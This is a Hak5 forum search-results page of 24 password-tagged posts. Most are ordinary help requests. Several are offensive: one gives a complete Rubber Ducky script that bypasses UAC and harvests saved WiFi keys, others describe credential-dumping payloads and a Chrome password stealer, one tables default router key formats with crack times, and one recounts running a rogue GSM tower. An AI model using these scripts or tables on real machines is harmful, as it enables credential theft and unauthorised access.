Search the Community

Showing results for tags 'password'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 24 results

  1. When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  2. For around a year I've been using Dashlane's Premium tier however my subscription has recently run out and before I spend another $40 I want to be sure there are no better alternatives. I was looking at Lastpass as a replacement but with the upcoming acquisition by Citrix, I'm not to keen on what they might be planning for the service. I am keen on open source software and tend to use them whenever possible but in all honesty, I want to hear your experiences with the different software options available. For me I consider syncing between devices quite important however I understand this usually comes with a cost and it's normally only available on proprietary software so I am happy to sacrifice this for open and free alternatives. Cheers!
  3. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  4. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  5. Hi everyone, Lazagne project First I tried to run this exe lazagne.exe on my desktop and i see in 2-3 seconds all my passwords from browsers and also hashes. So i choose to use this exe on my rubber ducky but nothing happened. I joined the script you can download it. First i tried to run it without saving the results but in the beginning i will be happy to run it. Secondly save the results on the usb will be great. Thanks for the help in advance. LAZAGNE USB.txt
  6. Is there a way to reset the root password without logging in.
  7. Hi, My friend got their facebook and twitter account hacked. Do any members know if it's possible to find out 1) who could have done it? (unlikely I know) 2) location of the hack? (if Q1 is unlikely, at least by narrowing the location of the compromise can help narrow down who did it). TIA : )
  8. Hi, just throwing out an idea about making a little video about encrypting external drives with key/usb, which preferably works cross-platform.
  9. @Snubs, for xmas i got myself a shiny and new bladeRFx40.  YAY!   Knowing your love for all things SDR, I wanted to share  with you a synopsis of my adventures with the bladeRF.  I have set up a raspberryPi with YateBTS and gps-sdr-sim: https://github.com/osqzss/gps-sdr-sim

    I am now able to run my own GSM BTS or spoof a GPS satellite that tells nearby devices they are actually at the Kremlin.. fun. 

    YateBTS obviously really caught my interest as i quickly discovered after buying a pack of $1 sim cards a best buy and putting them in a couple of unlocked devices, I was able to get the ATT cards to automatically connect to my BTS using MCC:310 and MNC:410 in combination to make my BTS appear to be an ATT tower.  (no worries, as i did this in a  lead box to prevent my signal from leaking to the real world, wouldn't want to go to interfere with the outside world)  I was also able to get T-mobile cards to connect by manually forcing them, but i suppose i could find the MCC and MNC for them as well and get an auto connect. 

    Anyway, YATES is set up to automatically send a greeting SMS to phones that connect, of which i of course  altered to say "Emergency Alert: Someone has farted"  But it got me thinking, if someone like me with little to no real knowledge around RF was able to do this for under $500 and a 12 hour investiment, why is GSM still being used.  seems like anyone could build an IMSI catcher or stingray.   One could potentially go into a public venue with bad cell reception and start sending "greeting messages" to all the GSM phones with roaming enabled, creating a localized histeria of "wait, who farted?!?"   Now of course my curious mind is wondering how secure the Emergency Broadcast system is as well?  https://en.wikipedia.org/wiki/Cell_Broadcast

    I would love to see you do a segment on this..

    Onus

  10. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are; 13,774,031,184 password hashes per day 573,917,966 per hour 9,565,299 per minute 159,421 per second Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info! SSID Length Password Format Combinations Time 2WIREXXX 10 0-9 10,000,000,000 17 hrs 3MobileWiFi 8 0-9 a-z 2,821,109,907,456 7 mth 3Wireless-Modem-XXXX 8 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) 65,536 1 sec Alice_XXXXXXXX 24 0-9 a-z 22,452,257,707,354,557,240,087,211,123,792,674,816 Never AOLBB-XXXXXX 8 0-9 A-Z 2,821,109,907,456 7 mth ATT### 10 0-9 10,000,000,000 17 hrs ATTxxxx 0000 10 0-9 A-Z 3,656,158,440,062,976 Never ATTxxxxxxx 12 a-z + symbols 1,449,225,352,009,601,191,936 Never belkin.xxx 8 2-9 a-f 1,475,789,056 2.5 hrs belkin.xxxx 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin.XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin_XXXXXX 8 0-9 A-F 4,294,967,296 7.5 hrs BigPondXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth BOLT!SUPER 4G-XXXX 8 4 numbers + Last 4 of SSID 65,536 1 sec BrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. BTHomeHub(1)-XXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth BTHomeHub2-XXXX 10 2-9 a-f 289,254,654,976 3 wks BTHub3 10 2-9 a-f 289,254,654,976 3 wks BTHub4 10 2-9 a-f 289,254,654,976 3 wks BTHub5 10 2-9 a-f 289,254,654,976 3 wks BTHub6 10, 12 0-9 a-z A-Z 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 Never CenturyLinkXXXX 14 0-9 a-f 72,057,594,037,927,936 Never Cisco 26 0-9 a-f 43,608,742,899,428,874,059,776 Never Digicom_XXXX 8 0-9 A-Z 2,821,109,907,456 7 mth DJAWEB_##### 10 0-9 10,000,000,000 17 hrs Domino-XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs E583x-xxxx 8 0-9 10,000,000 1 min E583x-xxxxx 8 0-9 A-F 4,294,967,296 7.5 hrs EasyBox 904 LTE 9 0-9 a-z A-Z 13,537,086,546,263,552 Never EasyBox-###### 9 0-9 A-F 68,719,476,736 5 days EEBrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. FRITZ!Box Fon WLAN #### 16 0-9 10,000,000,000,000,000 Never FrontierXXXX 10 0-9 10,000,000,000 17 hrs Hitron 12 0-9 A-Z (sometimes use the device’s serial number as the default key!) 4,738,381,338,321,616,896 Never INFINITUM#### 10 0-9 10,000,000,000 17 hrs iPhone 5 ? Lowercase word plus 4 numbers 172000^65,536 Need dict. Keenetic-XXXX 8 0-9 a-z A-Z 218,340,105,584,896 Never Linkem_XXXXXX 8 0-9 10,000,000 1 min Livebox-XXXX ? ? mifi2 13 0-9 A-Z 170,581,728,179,578,208,256 Never MobileWifi-xxxx 8 0-9 10,000,000 1 min MYWIFI (EE) - MYWIFI + 4 numbers 65,536 1 sec NETGEARXX - Adjective + Noun + 3 numbers Need dict. Netia-XXXXXX 13 0-9 a-f 4,503,599,627,370,496 Never ONOXXXX 10 0-9 10,000,000,000 17 hrs Orange-0a0aa0 8 0-9 a-f 4,294,967,296 7.5 hrs Orange-AA0A00 12 0-9 A-F 281,474,976,710,656 Never Orange-XXXX 8 2345679 ACEF 214,358,881 23 mins PLDT - PLDTWIFI + Last 5 digits of router MAC 1 1 sec Plusnet Broadband UK 64 a-z A-Z 0-9 - Never PlusnetWireless-XXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth PLUSNET-XXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Sitecom_XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs SKYXXXXX 8 A-Z http://www.ph-mb.com/products/sky-calc 208,827,064,576 2 wks SpeedTouchXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TALKTALK-XXXXXX 8 346789 A-Z (bar ILOSZ) 282,429,536,481 3 wks TDC-#### 9 0-9 a-f 68,719,476,736 5 days Tech_XXXXXXXX 8 A-Z 208,827,064,576 15 days Technicolor-Router 10 0-9 A-F 1,099,511,627,776 2.5 mth Telecom-XXXXXXXX ? ? TelstraXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TELUSXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Thomson 10 0-9 A-F 1,099,511,627,776 2.5 mth ThomsonXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TIM_PN51T_XXXX 8 0-9 WPS PIN is 12345670 10,000,000 1 min TNCAP-XXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TNCAPXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TP-LINK_###### 8 0-9 0-9 A-F 10,000,000 1 min TRENDnet TEW-123ABC 11 First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries 2,821,109,907,456 7 mth TRKASHI-###### 8 2 numbers, 6 digits (10^2)^(26^6) Need dict. UNITE-XXXX 8 0-9 10,000,000 1 min UPCXXXXXXX 8 A-Z 208,827,064,576 15 days Verizon MIFIXXXX XXXX 11 0-9 100,000,000,000 7.5 days virginmediaXXXXXX 8 a-z (bar iol) 78,310,985,281 6 days VirginMobile MiFiXXXX XXX 11 0-9 100,000,000,000 7.5 days VMXXXXXXX 12 0-9 a-z A-Z 3,226,266,762,397,899,821,056 Never VMXXXXXXX-2G 8 a-z (bar iol) 78,310,985,281 6 days VMXXXXXXX-5G 8 a-z (bar iol) 78,310,985,281 6 days Vodaphone_XXXXXXXX 15 0-9 a-z 221,073,919,720,733,357,899,776 Never WLAN1-XXXXXX 11 0-9 A-F 17,592,186,044,416 Never ZyXELXXXXXX 13 10 0-9 A-Z 0-9 A-F 1,099,511,627,776 2.5 mth Please inform me of any inaccuracies or additional data you feel could be added. Enjoy! *edit* My sources are my own personal experiences, plus; http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/ https://scotthelme.co.uk/ee-brightbox-router-hacked/ https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959 https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  11. I have created a new usb rubber ducky script which can steal chrome passwords in the blink of an eye. to see the code goto my github page. github: https://github.com/Nuk3leus/Ducky-chrome-password-stealer any contribution to improve this script would be great. post on this forum or email me at Nuk3leus@gmail.com
  12. Greetings! I really hope this isn't a silly question. I was talking with my friend about the NANO and how it can deauth clients on a network, then convince those clients to connect to the NANO as a rogue access point. I realize that it is not difficult to capture and rebroadcast SSIDs, but they are always open access points. If I wanted to capture the WPA or WPA2 handshake, is there a way to either log it and send it to another machine to be cracked, or just grab whatever information the device sends to the NANO, and use that to create a copy of the original SSID complete with its password? Basically, what I am trying to figure out is if the NANO can capture data that will assist in knowing the password to a particular network. I am still learning how handshakes, frames, and beacons work, and although I have a basic understanding, I am not sure if this is feasible or not. I know WPA and WPA2 passwords are hard to crack, but would it help if the device connecting to the rogue AP tried to give that rogue AP its part of that handshake? Would it be easier (or even feasible) to just go into that client system and take whatever the saved password is and store it for future use? Any clarity or resources on this subject would be appreciated. Cheers, Dez
  13. I have been hired into a new company. one task I have been challenged with is to discover the password for a netgear GS752TP switch we have, but i cannot wipe the switch yet. this is because no one has documentation on this switch, and they don't have VLAN information on it (this switch will be removed from PROD once i can audit it). is there a way to 'discover' the password, or otherwise reset it like you can with Cisco switches?
  14. Regarding password statistics and differences between demographics, have a little shufti at these. Good read. https://www.unix-ninja.com/p/Password_DNA https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvUGFzc3dvcmQgRE5BIEFwcGVuZGl4IG9mIENvbXBpbGVkIERhdGEucGRm And a free wordlist, compiled from the list used to create these statistics (looks half decent); https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvZG5hLmRpY3Q
  15. I have forgotten my password to my Lanturtle (you dont have to say anything). What can i do to reset my password or the device?
  16. **This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning. REM Title: WiFi password grabber save to twin duck SD REM Author: silent_noise REM Original by: Siem REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck REM requires Twin Duck firmware and SD card to be named "DUCKY" REM Adjust time for driver install DELAY 3000 REM Minimize all windows WINDOWS d REM Open cmd & bypass UAC DELAY 500 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 600 REM Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 100 REM Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM Delete A.txt STRING del A.txt ENTER REM Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER DELAY 100 REM Send Log.txt to sd card STRING copy Log.txt %duck%\%computername%-wifi-passwords.txt ENTER DELAY 500 REM Delete Log.txt and exit STRING del Log.txt & exit ENTER
  17. Hey, a friend of mine bought an older computer from his employer than is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using OPHCrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
  18. i went into "user setings" and changed "asded at login" to " not asded on login". now i cant sign in. it does not give me the option to enter a password just says login, but playes the incorect pw sound when i try i can get into the guest account but that does me no good case su and sudo dont work i can ctrl alt f1 and login to the user there i tried sudo visudo and changed the line to read NOPASSWD:ALL but that did not work anyone know how i can chage back the user settings to ask for password at login from terminal?
  19. Hey there, So I was cleaning my pc by going back to the original state and when finished I created a new password. However I was a bit drunk and probably misspelled it. However after many tries I gave up and searched for other solutions. This lead me to Ophcrack which I downloaded on a DVD and tried to run. But it gave an error about not finding the requested table(s). Now after a lot of tries with other programs and bootable USB's etc. it just won't work. Can anybody help me with this issue? I've got an Windows 7 64x OS. Starting script: ophcrack-launcher.sh Searching tables in: /media/sdc1/tables Tables found: /media/sdc/tables/vista_free/table0.bin List of Windows partitions containing hashes: 0. /media/sda2/WINDOWS/System32/config 1. /media/sda4/Windows/System32/config Select the partition to crack: 0 Starting Ophcrack 4 hashes have been found in the encrypted SAM found in /media/sda2/WINDOWS/System32/config/. Did not find the requested table(s) /media/sdc1/tables/vista_free/table0.bin. The passwords have been saved in /tmp/ophcrack.txt Press ENTER to continue... My console log Hope somebody can help me! If you need more information ask me! Regards, Rover PS. English is not my foreign language and i've typed the console log so there may be type mistakes.
  20. hey guys, I was hoping anyone could help me out with creating a wordlist how i desire with crunch. eg- usr1pass1, usr2pass2, usr3pass3......usr99pass99
  21. Hi, how would I sniff https passwords using the nano? I had a mark 4 a while back and I didnt have much success. Also, how would I get the client to connect to the pineapple if they are already connected to a network. Thanks!
  22. I need a 12 character AZ 09 wordlist. When I try to make one with Crunch on Kali the size is astronomical. It would be nice to be able to have crunch create a list for me that automatically prunes itself to keep a constant size consistent with the passwords per-second. http://lastbit.com/pswcalc.asp is suggesting to try every AZ09 12 digit password would probably take well longer than my lifetime. Regardless if anyone knows how to make a self deleting wordlist I would be interested to learn even if it will not be utilized where I imagined it being used. Thanks everyone.
  23. long story short: I had a box at work get compromised at and I pulled it off the network then initiated a forensic investigation. When the vendor came back with the report one section showed a memory dump of all the accounts on the box. All except one account showed their passwords encrypted, that last account showed the password in clear text in memory. What can I start looking up to understand how or why this would happen? I figured this would be a good place to ask this question. The PC is windows 7 and the account that had it's PW in clear text in the memory dump was domain admin.
  24. I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule